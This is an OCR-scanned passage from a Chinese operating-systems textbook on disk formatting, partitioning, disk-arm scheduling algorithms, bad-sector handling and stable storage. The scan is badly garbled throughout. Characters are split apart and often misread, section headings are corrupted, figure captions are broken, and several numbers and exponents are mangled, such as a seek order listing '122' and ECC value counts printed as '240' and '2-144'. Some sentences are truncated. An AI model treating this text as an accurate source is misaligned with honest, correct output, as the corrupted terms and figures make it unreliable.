而 区 将 从 磁头 下 通过 。 当 完成 了 回 主 存 的 复制 时 ， 控 制 右 将 不 得 不 等 符 
几乎 一 整 周 的 旋转 时 间 才 能 等 到 第 二 个 忆 区 再 次 回来 。 

















通过 在 格式 化 磁盘 时 以 交错 方式 对 扇 区 进行 编号 可 以 消除 这 一 问 
题 。 在 图 5-27a 中 ， 我 们 看 到 的 是 通常 的 编号 模式 〈 此 处 忽略 柱 面 余 
HE) 。 在 图 5-27b 中 ， 我 们 看 到 的 是 单 交 错 〈single interleaving) ， 它 可 
以 在 连续 的 扇 区 之 间 给 控制 器 以 喘息 的 空间 以 便 将 缓冲 区 复制 到 主 存 。 











图 5-27 a) Re; b) 单 交错 ; CMA 








如 果 复 制 过 程 非常 慢 ， 可 能 需要 如 图 5-27c 中 的 双 交 错 〈double 
interleaving) 。 如 果 控 制 器 拥有 的 缓冲 区 只 有 一 个 遍 区 ， 那 么 从 缓冲 区 
到 主 存 的 复制 无 论 是 由 控制 器 完成 还 是 由 主 CPU 或 着 DMA 芯 片 完成 都 
无 关 紧要 ， 都 要 花费 某 些 时 间 。 为 了 避免 需要 交错 ， 控 制 器 应 该 能 够 对 
整个 磁道 进行 缓存 ， 许 多 现代 控制 器 都 能 够 这 样 做 。 








在 低级 格式 化 完成 之 后 ， 要 对 磁盘 进行 分 区 。 在 逻辑 上 ， 每 个 分 区 
就 像 是 一 个 独立 的 磁盘 。 分 区 对 于 多 个 操作 系统 共存 是 必需 的 。 此 外 ， 
在 某 些 情况 下 ， 分 区 可 以 用 来 进行 交换 。 在 Pentium 和 大 多 数 其 他 计算 
机 上 ，0 扇 区 包含 主 引导 记录 (master boot record) ， 它 包含 某 些 引 导 代 
码 和 末尾 的 分 区 表 。 分 区 表 给 出 了 每 个 分 区 的 起 始 扇 区 和 大 小 。 在 
Pentium 上， 分 区 表 具 有 四 个 分 区 的 空间 。 如 果 这 四 个 分 区 都 用 于 
Windows， 那 么 它们 将 被 称 为 C:、D:、E: 和 F:， 并 且 作 为 单独 的 驱动 器 
对 待 。 如 果 它 们 中 有 三 个 用 于 Windows 一 个 用 于 UNIX， 那 么 Windows 会 
将 它 的 分 区 称 为 C:、D: 和 E:， 然 后 第 一 个 CD-ROM 是 F:。 为 了 能 够 从 硬 
盘 引 导 ， 在 分 区 表 中 必须 有 一 个 分 区 被 标记 为 活动 的 。 











在 准备 一 块 磁盘 以 便于 使 用 的 最 后 一 步 是 对 每 一 个 分 区 分 别 执行 一 
次 高 级 格式 化 Chigh-level format) 。 这 一 操作 要 设置 一 个 引导 块 、 空 闲 
存储 管理 〈 空 闲 列表 或 位 图 ) 、 根 目录 和 一 个 空 文件 系统 。 这 一 操作 还 
要 将 一 个 代码 设置 在 分 区 表 项 中 ， 以 表明 在 分 区 中 使 用 的 是 哪个 文件 系 





统 ， 因 为 许多 操作 系统 文 持 多 个 兼容 的 文件 系统 〈 由 于 历史 原因 ) 。 这 
时 ， 系 统 就 可 以 引导 了 。 


5.4.3 fe Bees yal RE GE 





本 小 市 我 们 将 一 般 地 讨论 与 磁盘 驱动 程序 有 关 的 儿 个 问题 。 首 先 ， 
考虑 读 或 者 写 一 个 磁盘 块 需要 多 长 时 间 。 这 个 时 间 由 以 下 三 个 因素 决 


er 


KE? 
1) 寻 道 时 间 CR GE S oh Ble ET Erg EST TA) 。 
2) wee EIR (AG a SS es Xe Fe BME PAT AEN TAI) 。 


3) 实 际 数据 传输 时 间 。 








对 大 多 数 磁盘 而 言 ， 寻 道 时 间 与 丸 外 两 个 时 间 相 比 占 主导 地 位 ， 所 
以 减少 平均 寻 道 时 间 可 以 充分 地 改善 系统 性 能 。 





如 果 磁 盘 驱 动 程序 每 次 接收 一 个 请 求 并 按照 接收 顺序 完成 请 求 ， 即 
先 来 先 服务 (First-Come, First-Served, FCFS) ， 则 很 难 优化 寻 道 时 
间 。 然 而 ， 当 磁盘 负载 很 重 时 ， 可 以 采用 其 他 策略 。 很 有 可 能 当 磁 盘 臂 
为 一 个 请 求 寻 道 时 ， 其 他 进程 会 产生 其 他 磁盘 请 求 。 许 多 磁盘 驱动 程序 
都 维护 着 一 张 表 ， 该 表 按 柱 面 号 索引 ， 每 一 柱 面 的 未 完成 的 请 求 组 成 一 
个 链表 ， 链 表 头 存放 在 表 的 相应 表 目 中 。 




















给 定 这 种 数据 结构 ， 我 们 可 以 改进 先 来 先 服务 调度 算法 。 为 了 说 明 


如 何 实现 ， 考 虑 一 个 具有 40 个 柱 面 的 假想 的 磁盘 。 假 设 读 柱 面 1 上 一 个 
数据 块 的 请 求 到 达 ， 当 对 柱 面 11 的 寻 道 正在 进行 时 ， 又 按 顺 序 到 达 了 对 
柱 面 1、36、16、34、9 和 12 的 请 求 ， 则 让 它们 进入 未 完成 的 请 求 表 ， 每 
一 个 柱 面 对 应 一 个 单独 的 链表 。 图 5-28 显 示 了 这 些 请 求 。 


初始 位 置 ”未 完成 的 请 求 
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寻 道 顺序 


BE: = Ja) 


图 5-28 最 短 寻 道 优 先 (SSF) 磁盘 调度 算法 





当前 请 求 〈 请 求 柱 面 11) 结束 后 ， 磁 盘 驱 动 程 序 要 选择 下 一 次 处 理 
哪 一 个 请 求 。 知 使 用 FCFS 算 法 ， 则 首先 选择 柱 面 1， 然 后 是 36， 以 此 类 
推 。 这 个 算法 要 求 磁 盘 臂 分 别 移动 10、35、20、18、25 和 3 个 柱 面 ， 总 


共 需 要 移动 111 个 柱 面 。 


另 一 种 方法 是 下 一 次 总 是 处 理 与 磁头 距离 最 近 的 请 求 以 使 寻 道 时 间 
最 小 化 。 对 于 图 5-28 中 给 出 的 请 求 ， 选 择 请 求 的 顺序 如 图 5-28 中 下 方 的 
折线 所 示 ， 依 次 为 12、9、16、1、34 和 36。 按 照 这 个 顺序 ， 磁 盘 辟 分 别 
需要 移动 1、3、7、15、33 和 2 个 柱 面 ， 总 共 需 要 移动 61 个 柱 面 。 这 个 算 


法 即 最 短 寻 道 优 先 (Shortest Seek First, SSF) ， 与 FCFS 算 法 相 比 ， 该 





算法 的 磁盘 臂 移动 几乎 减少 了 一 半 。 


但 是 ，SSF 算 法 存在 一 个 问题 。 假 设 当 图 5-28 所 示 的 请 求 正 在 处 理 
时 ， 不 断 地 有 其 他 请 求 到 达 。 例 如 ， 磁 盘 臂 移 到 柱 面 16 以 后 ， 到 达 一 个 
对 柱 面 8 的 新 请 求 ， 那 么 它 的 优先 级 将 比 柱 面 1 要 高 。 如 果 接 着 又 到 达 了 
一 个 对 柱 面 13 的 请 求 ， 磁 盘 臂 将 移 到 柱 面 13 而 不 是 柱 面 1。 如 果 磁 盘 负 
载 很 重 ， 那 么 大 部 分 时 间 磁 盘 臂 将 停留 在 磁盘 的 中 部 区 域 ， 而 两 端 极 端 
区 域 的 请 求 将 不 得 不 等 待 ， 直 到 负载 中 的 统计 波动 使 得 中 部 区 域 没有 请 
求 为 止 。 远 离 中 部 区 域 的 请 求 得 到 的 服务 很 差 。 因 此 获得 最 小 响应 时 间 
的 目标 和 公平 性 之 间 存 在 着 冲突 。 























高 层 建 筑 也 要 进行 这 种 权衡 处 理 ， 高 层 建 筑 中 的 电梯 调度 问题 和 磁 
盘 臂 调度 很 相似 。 电 梯 请 求 不 断 地 到 来 ， 随 机 地 要 求 电 梯 到 各 个 楼 层 
CRETE) 。 控 制 电梯 的 计算 机 能 够 很 容易 地 跟踪 顾客 按 下 请 求 按钮 的 顺 
序 ， 并 使 用 FCFS 或 者 SSF 为 他 们 提供 服务 。 


然而 ， 大 多 数 电梯 使 用 一 种 不 同 的 算法 来 协调 效率 和 公平 性 这 两 个 
相互 冲突 的 目标 。 电 梯 保 持 按 一 个 方向 移动 ， 直 到 在 那个 方向 上 没有 请 
求 为 止 ， 然 后 改变 方向 。 这 个 算法 在 磁盘 世界 和 电梯 世界 都 被 称 为 电梯 
算法 (elevator algorithm) ， 它 需要 软件 维护 一 个 二 进 制 位 ， 即 当前 方 
同位 : UP OIE) 或 是 DOWN (向 下 〉。 当 一 个 请 求 处 理 完 之 后 ， 磁 
盘 或 电梯 的 驱动 程序 检查 该 位 ， 如 果 是 UP， 人 磁盘 辟 或 电梯 舱 移 至 下 一 
个 更 高 的 未 完成 的 请 求 。 如 果 更 高 的 位 置 没 有 未 完成 的 请 求 ， 则 方向 位 




















取 反 。 当 方 癌 位 设置 为 DOWN 时 ， 同 时 存在 一 个 低位 置 的 请 求 ， 则 移 回 


该 位 置 。 


图 5-29 显 示 了 使 用 与 图 5-28 相 同 的 7 个 请 求 的 电梯 算法 的 情况 。 假 设 
方 同 位 初始 为 UP， 则 各 柱 面 获得 服务 的 顺序 是 122、16、34、36、9 和 
1， 磁 盘 辟 分 别 移动 1、4、18、2、27 和 8 个 柱 面 ， 总 共 移 动 60 个 柱 面 。 
在 本 例 中 ， 电 梯 算 法 比 SSF 还 要 稍微 好 一 点 ， 尽 管 通常 它 不 如 SSF。 电 
梯 算 法 的 一 个 优良 特性 是 对 任意 的 一 组 给 定 请 求 ， 磁 盘 辟 移动 总 次 数 的 
上 界 是 固定 的 : 正好 是 柱 面 数 的 两 倍 。 





初始 位 置 





寻 道 顺序 


一 时间 





图 5-29 调度 磁盘 请 求 的 电梯 算法 





对 这 个 算法 稍 加 改进 可 以 在 响应 时 间 上 具有 更 小 的 变异 (Teory， 
1972) ， 方 法 是 总 是 按 相 同 的 方向 进行 扫描 。 当 处 理 完 最 高 编号 柱 面 上 
未 完成 的 请 求 之 后 ， 磁 盘 臂 移动 到 具有 未 完成 的 请 求 的 最 低 编 号 的 柱 
面 ， 然 后 继续 治 向 上 的 方向 移动 。 实 际 上 ， 这 相当 于 将 最 低 编 号 的 柱 面 
看 作 是 最 高 编号 的 柱 面 之 上 的 相 邻 柱 面 。 




















东 些 磁盘 控制 器 提供 了 一 种 方法 供 软件 检查 磁头 下 方 的 当前 而 区 
号 。 对 于 这 种 磁盘 控制 器 ， 还 可 以 进行 妨 一 种 优化 。 如 果 针 对 同一 柱 面 
有 两 个 或 多 个 请 求 正 等 待 处 理 ， 驱 动 程序 可 以 友 出 请 求 读 写 下 一 次 要 
过 磁头 的 届 区 。 注 意 ， 当 一 个 柱 面 有 多 条 磁道 时 ， 相 继 的 请 求 可 能 针对 
不 同 的 磁道 ， 故 没有 任何 代价 。 因 为 选择 磁头 既 不 需要 移动 磁盘 臂 也 没 
有 旋转 延迟 ， 所 以 控制 器 几乎 可 以 立即 选择 任意 磁头 。 








如 果 磁 盘 具 有 寻 道 时 间 比 旋转 延迟 快 很 多 的 特性 ， 那 么 应 该 使 用 不 
同 的 优化 集 略 。 未 完成 的 请 求 应 该 按 导 区 号 排序 ， 并 且 当 下 一 个 局 区 区 

通过 磁头 的 时 候 ， 磁 盘 臂 应 该 飞快 地 移动 到 正确 的 磁道 上 对 其 进行 读 
或 者 与 。 


对 于 现代 硬盘 ， 寻 道 和 旋转 延迟 是 如 此 影响 性 能 ， 所 以 一 次 只 读 取 
一 个 或 两 个 忆 区 的 效率 是 非常 低下 的 。 由 于 这 个 原因 ， 许 多 磁盘 控制 圳 
总 是 读 出 多 个 忆 区 并 对 其 进行 高 速 缓存 ， 即 使 只 请 求 一 个 忆 区 时 也 是 如 
此 。 典 型 地 ， 读 一 个 忆 区 的 任何 请 求 将 导致 该 而 区 和 当前 磁道 的 多 个 或 
者 所 有 剩余 的 而 区 被 读 出 ， 读 出 的 出 区 数 取 决 于 控制 占 的 高速 缓存 中 有 
多 少 可 用 的 空间 。 例 如 ， 在 图 5-18 所 描述 的 磁盘 中 有 4MB 的 高 速 缓存 。 
高 速 缓存 的 使 用 是 由 控制 器 动态 地 决定 的 。 在 最 简单 的 模式 下 ， 高 速 绥 
存 被 分 成 两 个 区 段 ， 一 个 用 于 读 ， 一 个 用 于 写 。 如 果 后 来 的 读 操作 可 以 
用 控制 器 的 高 速 缓存 来 满足 ， 那 么 吏 可 以 立即 返回 被 请 求 的 数据 。 











值得 注意 的 是 ， 破 盘 控 制 器 的 高 速 缓存 完全 独立 于 操作 系统 的 高 速 
缓存 。 控 制 器 的 高 速 缓存 通 种 保存 还 没有 实际 被 请 求 的 块 ， 但 是 这 对 于 
读 操 作 是 很 便利 的 ， 因 为 它们 只 是 作为 茶 些 其 他 读 操 作 的 附带 效应 而 恰 
巧 要 在 磁头 下 通过 。 与 之 相反 ， 操 作 系统 所 维护 的 任何 高 速 缓存 由 显 式 
地 读 出 的 块 组 成 ， 并 且 操作 系统 认为 它们 在 较 近 的 将 来 可 能 再 次 需要 
例如， 保存 目录 块 的 一 个 磁盘 块 ) 。 








当 同 一 个 控制 器 上 有 多 个 驱动 器 时 ， 操 作 系统 应 该 为 每 个 驱动 器 都 
单独 地 维护 一 个 未 完成 的 请 求 表 。 一 旦 任何 一 个 驱动 器 空闲 下 来 ， 就 应 
该 发 出 一 个 寻 道 请 求 将 磁盘 辟 移 到 下 一 个 将 被 请 求 的 柱 面 处 (假设 控制 
IAB SIH) 。 当 前 传输 结束 时 ， 将 检查 是 否 有 驱动 器 的 磁盘 辟 位 
于 正确 的 柱 面 上 。 如 果 存 在 一 个 或 多 个 这 样 的 驱动 器 ， 则 在 磁盘 臂 已 经 
位 于 正确 柱 面 处 的 驱动 器 上 开始 下 一 次 传输 。 如 果 没 有 驱动 器 的 磁盘 臂 
处 于 正确 的 位 置 ， 则 驱动 程序 在 刚刚 完成 传输 的 驱动 器 上 发 出 一 个 新 的 
寻 道 命令 并 且 等 待 ， 直 到 下 一 次 中 断 到 来 时 检查 哪 一 个 磁盘 臂 首先 到 达 
了 目标 位 置 。 



































上 面 所 有 的 磁盘 调度 算法 都 是 默认 地 假设 实际 磁盘 的 几何 规格 与 虚 
拟 几 何 规格 相同 ， 认 识 到 这 一 点 十 分 重要 。 如 果 不 是 这 样 ， 那 么 调度 磁 
盘 请 求 就 训 无 意义 ， 因 为 操作 系统 实际 上 不 能 断定 柱 面 40 与 柱 面 200 哪 
一 个 与 柱 面 39 更 接近 。 另 一 方面 ， 如 果 磁 盘 控制 器 能 够 接收 多 个 未 完成 
的 请 求 ， 它 就 可 以 在 内 部 使 用 这 些 调度 算法 。 在 这 样 的 情况 下 ， 算 法 仍 





然 征 有 效 的 ， 但 是 低 了 一 个 层次 ， 局 限 在 控制 器 内 部 。 


5.4.4 ”错误 处 理 


磁盘 制造 商 通过 不 断 地 加 大 线性 位 密度 而 持续 地 推进 技术 的 极限 。 
在 一 块 5.25 英 寸 的 磁盘 上 ， 处 于 中 间 位 置 的 一 个 磁道 大 约 有 300mm 的 周 
长 。 如 果 该 磁道 存放 300 个 512 字 节 的 扇 区 ， 考 虑 到 由 于 前 导 人 码 、ECC 和 
而 区 间 隐 而 损失 了 部 分 空间 这 样 的 实际 情况 ， 线 性 记录 密度 大 约 是 
5000b/mm。 记 录 5000b/mm 需 要 极其 均匀 的 基 片 和 非常 精细 的 氧化 物 涂 
层 。 但 是 ， 按 照 这 样 的 规范 制造 磁盘 而 没有 瑕 症 是 不 可 能 的 。 一 旦 制造 
技术 改进 到 一 种 程度 ， 即 在 那样 的 密度 下 能 够 无 瑕 疲 地 操作 ， 磁 盘 设 计 
者 就 会 转 到 更 高 的 密度 以 增加 容量 。 这 样 做 可 能 会 再 次 引入 瑕 症 。 


制造 时 的 瑕 竟 会 引入 坏 届 区 ， 也 就 是 说 ， 刷 区 不 能 正确 地 读 回 刚刚 
写 到 其 上 的 值 。 如 果 瑕 竟 非 常 小 ， 比 如 说 只 有 几 人 位， 那么 使 用 坏 遍 区 并 
且 每 次 只 是 让 ECC 校 正 错误 是 可 能 的 。 如 果 瑕 疲 较 大 ， 那 么 错误 就 不 可 
REU TEE ait o 





对 于 坏 块 存在 两 种 一 般 的 处 理 方法 : 在 控制 器 中 对 它们 进行 处 理 或 
者 在 操作 系统 中 对 它们 进行 处 理 。 在 前 一 种 方法 中 ， 磁 盘 在 从 工厂 出 ) 
之 前 要 进行 测试 ， 并 且 将 一 个 坏 司 区 列表 写 在 磁盘 上 。 对 于 每 一 个 坏 司 
区 ， 用 一 个 备用 扇 区 答 换 它 。 








有 两 种 方法 进行 这 样 的 殖 换 。 在 图 5-30a 中 ， 我 们 看 到 单个 磁盘 磁 








道 ， 它 具有 30 个 数据 局 区 和 两 个 备用 届 区 。 局 区 7 是 有 瑕 兹 的 。 控 制 占 
所 能 够 做 的 事情 是 将 备用 局 区 之 一 重 映射 为 肩 区 7， 如 图 5-30b 所 示 。 男 
一 种 方法 是 将 所 有 局 区 四 上 移动 一 个 届 区 ， 如 图 5-30c 所 示 。 在 这 两 种 
情况 下 ， 控 制 器 部 必须 知道 哪个 届 区 是 哪个 而 区 。 它 可 以 通过 内 部 的 表 
来 跟踪 这 一 信息 《每 个 磁道 一 张 表 ) ,或 者 通过 重 写 前 导 码 来 给 出 重 映 
财 的 而 区 号 。 如 果 是 重 写 前 导 码 ， 那 么 图 5-30c 的 方法 就 要 做 更 多 的 工 
作 〈 因 为 23 个 前 导 码 必须 重 写 ) ， 但 是 最 终 会 提供 更 好 的 性 能 ， 因 为 整 
个 磁道 仍然 可 以 在 旋转 一 周 中 读 出 。 











图 5-30 人 具有 一 个 坏 扇 区 的 磁盘 磁道 ; 用 备用 扇 区 替换 坏 扇 区; 0 
移动 所 有 扇 区 以 回避 坏 扇 区 





驱动 器 安装 之 后 在 正常 工作 期 间 也 会 出 现 错误 。 在 过 到 ECC 不 能 处 
理 的 错误 时 ， 第 一 让 防线 只 古 试图 再 次 读 。 茶 些 读 错 误 是 瞬时 性 的 ， 也 
就 是 说 是 由 磁头 下 的 灰尘 导致 的 ， 在 第 二 次 党 试 时 错误 就 消失 了 。 如 果 
控制 如 注意 到 它 在 人 菏 个 山区 过 到 重复 性 的 错误 ， 那 么 可 以 在 该 出 区 完全 











和 死 掉 之 前 切换 到 一 个 备用 而 区 。 这 样 就 不 会 丢失 数据 并 且 操作 系统 和 用 
户 甚 至 都 不 会 注意 到 这 一 问题 。 通 常 使 用 的 是 图 5-30b 的 方法 ， 因 为 其 
他 届 区 此 刻 可 能 包含 数据 。 而 使 用 图 5-30c 的 方法 则 不 但 要 重 写 前 导 
码 ， 还 要 复制 所 有 的 数据 。 











前 面 我 们 曾 说 过 存在 两 种 一 般 的 处 理 错误 的 方法 : 在 控制 器 中 或 者 
在 操作 系统 中 处 理 错误 。 如 果 控 制 器 不 具有 像 我 们 已 经 讨论 过 的 那样 透 
明 地 重 映射 忆 区 的 能 力 ， 那 么 操作 系统 必须 在 软件 中 做 同样 的 事情 。 这 
意味 着 操作 系统 必须 首先 获得 一 个 坏 忆 区 列表 ， 或 者 是 通过 从 磁盘 中 读 
出 该 列表 ， 或 者 只 是 由 它 自己 测试 整个 磁盘 。 一 旦 操作 系统 知道 哪些 局 
区 是 坏 的 ， 它 就 可 以 建立 重 映射 表 。 如 果 操 作 系 统 想 使 用 图 5-30c 的 方 
法 ， 它 就 必须 将 扇 区 7 到 扇 区 29 中 的 数据 向 上 移动 一 个 扇 区 。 








如 果 由 操作 系统 处 理 重 映 冉 ， 那 么 它 必 须 确保 坏 届 区 不 出 现在 任何 
文件 中 ， 并 且 不 出 现在 空间 列表 或 位 图 中 。 做 到 这 一 点 的 一 种 方法 是 创 
委 一 个 包含 所 有 坏 导 区 的 秘密 的 文件 。 如 果 该 文件 不 被 加 入 文件 系统 ， 
用 户 就 不 会 意外 地 读 到 它 〈 或 者 更 糟糕 地 ， 释 放 它 ) 。 





然而 ， 还 存在 另 一 个 问题 : 备份 。 如 果 磁 盘 是 一 个 文件 一 个 文件 地 
做 备份 ， 那 么 非 第 重要 的 是 备份 实用 程序 不 去 尝试 复制 坏 块 文件 。 为 了 
防止 肥 生 这 样 的 事情 ， 操 作 系 统 必须 很 好 地 隐藏 坏 块 文件 ， 以 至 于 备份 
实用 程序 也 不 能 发 现 它 。 如 果 磁 盘 是 一 个 司 区 一 个 司 区 地 做 备份 而 不 是 
一 个 文件 一 个 文件 地 做 备份 ， 那 么 在 备份 期 间 防 止 读 错误 是 十 分 困难 





的 ， 如 果 不 是 不 可 能 的 话 。 惟 一 的 希望 是 备份 程序 具有 足够 的 智能 ， 在 
读 失 败 10 次 后 放 奔 并 且 继 续 下 一 个 而 区 。 


坏 鹿 区 不 是 惟一 的 错误 来 源 ， 也 可 能 发 生 磁 盘 臂 中 的 机 械 故 障 引起 
的 寻 道 错误 。 控 制 器 内 部 跟踪 着 磁盘 臂 的 位 置 ， 为 了 执行 寻 道 ， 它 发 出 
一 系列 脉 训 给 磁盘 臂 电 机 ， 每 个 柱 面 一 个 脉冲 ， 这 样 将 磁盘 臂 移 到 新 的 
柱 面 。 当 磁盘 臂 移 到 其 目标 位 置 时 ， 控 制 器 从 下 一 个 扇 区 的 前 导 码 中 读 
出 实际 的 柱 面 号 。 如 果 磁 盘 臂 在 错误 的 位 置 上 ， 则 发 生 寻 道 错误 。 





大 多 数 人 硬盘 控制 器 可 以 自动 纠正 寻 道 错误 ,但 是 大 多 数 软盘 控制 器 
(包括 Pentium 的 ) 只 是 设置 一 个 错误 标志 位 而 把 余下 的 工作 留 给 驱动 
程序 。 驱 动 程序 对 这 一 错误 的 处 理 办 法 是 发 出 一 个 recalibrate (重新 校 
HED 命令 ， 让 磁盘 臂 尽 可 能 地 向 最 外 面 移动 ， 并 将 控制 器 内 部 的 当前 柱 
面 重 置 为 0。 通 党 这样 束 可 以 解决 问题 了 。 如 果 还 不 行 ， 则 只 好 修理 豫 
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正如 我 们 已 经 看 到 的 ， 控 制 占 实际 是 一 个 专用 的 小 计算 机 ， 它 有 软 
件 、 变 量 、 缓 冲 区 ， 偶 尔 还 出 现 故障 。 有 时 一 个 不 寻 第 的 事件 序列 ， 例 
如 一 个 驱动 器 友 生 中 断 的 同时 为 一 个 驱动 右 友 出 recalibrate 命 令 ， 束 可 
能 引发 一 个 故障 ， 导 致 控制 器 陷入 一 个 循环 或 失去 对 正在 做 的 工作 的 跟 
踪 。 控 制 占 的 设计 者 通常 考虑 到 最 坏 的 情形 ， 在 心 片 上 提供 了 一 个 引 
脚 ， 当 该 引 脚 被 置 起 时 ， 迫 使 控制 器 筷 记 和 它 正 在 做 的 任何 事情 并 且 将 其 
目 身 复位 。 如 宁 其 他 方法 都 失败 了 ， 磁 盘 驱 动 程序 可 以 设置 一 个 控制 位 











以 触发 该 信号 ， 将 控制 器 复位 。 如 果 还 不 成 功 ， 驱 动 程序 所 能 做 的 就 是 
打印 一 条 消息 并 且 放 弃 。 








重新 校准 一 块 磁盘 会 发 出 古怪 的 噪音 ， 但 是 正常 工作 时 并 不 让 人 烦 
扰 。 然 而 ， 存 在 这 样 一 种 情形 ， 对 于 具有 实时 约束 的 系统 而 言 重新 校准 
征 一 个 严重 的 问题 。 当 从 硬盘 播放 视频 时 ， 或 者 当 将 文件 从 硬盘 烧 录 到 
CD-ROM 上 时 ， 来 目 硬 盘 的 位 流 以 均 勾 的 速率 到 达 是 必需 的 。 在 这 样 的 
情况 下 ， 重 新 校准 会 在 位 流 中 插入 间 际 ， 因 此 古 不 可 接受 的 。 称 为 AV 
盘 (Audio Visual disk， 首 视盘 ) 的 特殊 驱动 器 永远 不 会 重新 校准 ， 因 
而 可 用 于 这 样 的 应 用 。 











5.4.5 ”稳定 存储 器 








正如 我 们 已 经 看 到 的 ， 磁 盘 有 时 会 出 现 错误 。 好 山区 可 能 突然 变 成 
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普 或 者 整个 驱动 右 骨 尝 提 供 保护 。 然 而 ，RAID 首 先 不 能 对 将 坏 数 据 写 
下 的 写 错误 提供 保护 ， 并 且 也 不 能 对 写 操作 期 间 的 骨 尝 提供 保护 ， 这 样 
束 会 破坏 原始 数据 而 不 能 以 更 新 的 数据 丛 换 它们 。 


对 于 某 些 应 用 而 言 ， 决 不 丢失 或 破坏 数据 是 绝对 必要 的 ， 即 使 面临 
磁盘 和 CPU 错误 也 是 如 此 。 理 想 的 情况 是 ， 磁 盘 应 该 始终 没有 错误 地 工 
作 。 但 是 ， 这 是 做 不 到 的 。 所 能 够 做 到 的 是 ， 一 个 磁盘 子 系统 具有 如 下 
特性 : 当 一 个 写 命令 发 给 它 时 ， 磁 盘 要 么 正确 地 写 数据 ， 要 么 什么 也 不 
做 ， 让 现 有 的 数据 完整 无 缺 地 留 下 。 这 样 的 系统 称 为 稳定 存储 器 
(stable storage) ， 并 且 是 在 软件 中 实现 的 (Lampson 和 Sturgis， 

1979) 。 目 标 是 不 惜 一 切 代价 保持 磁盘 的 一 臻 性。 下面 我 们 将 描述 这 种 
最 初 思想 的 一 个 微小 的 变 体 。 








在 描述 算法 之 前 ， 重 要 的 是 对 于 可 能 发 生 的 错误 有 一 个 清晰 的 模 
型 。 该 模型 假设 在 磁盘 写 一 个 块 〈 一 个 或 多 个 扇 区 ) 时 ， 写 操作 要 么 是 
正确 的 ， 要 么 是 错误 的 ， 并 且 该 错误 可 以 在 随后 的 读 操作 中 通过 检查 
ECC 域 的 值 检测 出 来 。 原 则 上 ， 保 证 错误 检测 是 根本 不 可 能 的 ， 这 是 因 


为 ， 假 如 使 用 一 个 16 字 节 的 ECC 域 保护 一 个 512 字 节 的 扇 区 ， 那 么 存在 
着 240 个 数据 值 而 仅 有 2 半 个 ECC 值 。 因 此 ， 如 果 一 个 块 在 写 操作 期 间 
出 现 错误 但 是 ECC 没 有 出 错 ， 那 么 存在 着 几 亿 亿 个 错误 的 组 合 可 以 产生 
相同 的 ECC。 如 果 某 些 这 样 的 错误 出 现 ， 则 错误 不 会 被 检测 到 。 大 体 

上 上， 随机 数据 具有 正确 的 16 字 节 ECC 的 概率 大 约 是 2-144 。 该 概率 值 足够 
小 以 至 于 我 们 可 以 视 其 为 零 ， 尺 管 它 实际 上 并 不 为 零 。 











该 模型 还 假设 一 个 被 正确 写 入 的 虱 区 可 能 会 目 发 地 变 坏 并 且 变 得 不 
可 读 。 然 而 ， 该 假设 是 : 这 样 的 事件 非常 少见 ， 以 至 于 在 合理 的 时 间 间 
阳 内 【例如 1 天 〉 让 相同 的 而 区 在 第 二 个 (独立 的 ) 驱动 右上 变 坏 的 概 
率 小 到 可 以 忽略 的 程度 。 


该 模型 还 假设 CPU 可 能 出 故障 ， 在 这 样 的 情况 下 只 能 停机 。 在 出 现 
故障 的 时 刻 任何 处 于 进行 中 的 磁盘 写 操作 也 会 俘 止 ， 导 致 不 正确 的 数据 
写 在 一 个 属 区 中 并 且 后 来 可 能 会 检测 到 不 正确 的 ECC。 在 所 有 这 些 情况 
下 ， 稳 定 存 储 占 就 写 操作 而 言 可 以 提供 100% 的 可 靠 性 ， 要 么 就 正确 地 
工作 ， 要 么 就 让 旧 的 数据 原封 不 动 。 当 然 ， 它 不 能 对 物理 灾难 提供 保 
护 ， 例 如 ， 发 生地 震 ， 计 算 机 跌落 100m 挥 入 一 个 裂缝 并 且 陷 入 沸腾 的 
宕 浆 池 中 ， 在 这 样 的 情况 下 用 软件 将 其 恢复 是 勉 为 其 难 的 。 





稳定 存储 强 使 用 一 对 完全 相同 的 磁盘 ， 对 应 的 块 一 同 工 作 以 形成 一 
个 无 兰 错 的 其 。 当 不 存在 错误 时 ， 在 两 个 驱动 硕 上 对 应 的 块 是 相同 的 ， 
读 取 任 意 一 个 都 可 以 得 到 相同 的 结果。 为 了 达到 这 一 目的 ， 定 义 了 下 述 





三 种 操作 : 





1) 稳 定 写 (stable write) 。 稳 定 写 首先 将 块 写 到 驱动 副 1 上 ， 然 后 将 
其 读 回 以 校 验 写 的 是 正确 的 。 如 果 写 的 不 正确 ， 那 么 就 再 次 做 写 和 重读 
操作 ， 一 直到 n 次 ， 直 到 正常 为 止 。 经 过 n 次 连续 的 失败 之 后 ， 就 将 该 块 
重 映 射 到 一 个 备用 其 上 ， 并 且 重 复写 和 重读 操作 直到 成 功 为 止 ， 无 论 要 
符 试 多 少 个 备用 块 。 在 对 驱动 器 1 的 写成 功 之 后 ， 对 驳 动 器 2 上 对 应 的 块 
进行 号 和 重读 ， 如 宋 需 要 的 话 吏 重 复 这 样 的 操作 ， 直 到 最 后 成 功 为 止 。 
如 琳 不 存在 CPU 册 沉 ， 那 么 当 稳 定 写 完成 后 ， 块 就 正确 地 被 写 到 两 个 驱 
动 器 上， 并 且 在 两 个 驱动 器 上 得 到 校 验 。 











2) 稳 定 读 (stable read) 。 稳 定 读 首先 从 驱动 器 1 上 读 取 块 。 如 果 这 
一 操作 产生 错误 的 ECC， 则 再 次 尝试 读 操 作 ， 一 直到 n 次 。 如 果 所 有 这 
些 操作 都 给 出 错误 的 ECC， 则 从 驱动 器 2 上 读 取 对 应 的 数据 块 。 给 定 一 
个 成 功 的 稳定 写 为 数据 块 留 下 两 个 可 靠 的 副本 这 样 的 事实 ， 并 且 我 们 假 
设 在 合理 的 时 间 间 隔 内 相同 的 块 在 两 个 驱动 器 上 自发 地 变 坏 的 概率 可 以 
忽略 不 计 ， 那 么 稳定 读 就 总 是 成 功 的 。 





DAKE (crash recovery) 。 朋 泪 之 后 ， 恢 复 程序 扫描 两 个 磁 
盘 ， 比 较 对 应 的 块 。 如 有 果 一 对 块 都 是 好 的 并 且 是 相同 的 ， 就 什么 都 不 
做 。 如 条 其 中 一 个 上 共有 ECC 错 误 ， 那 么 坏 块 聘用 对 应 的 好 块 来 覆 凋 。 如 
果 一 对 块 都 是 好 的 但 是 不 相同 ， 那 么 束 将 驱动 器 1 上 的 块 写 到 驱动 器 2 














如 果 不 存 在 CPU 崩 尝 ， 那 么 这 一 方法 总 是 可 行 的 ， 因 为 稳定 写 总 是 
对 每 个 块 写 下 两 个 有 效 的 副本 ,并且 假 设 自 发 的 错误 决 不 会 在 相同 的 时 
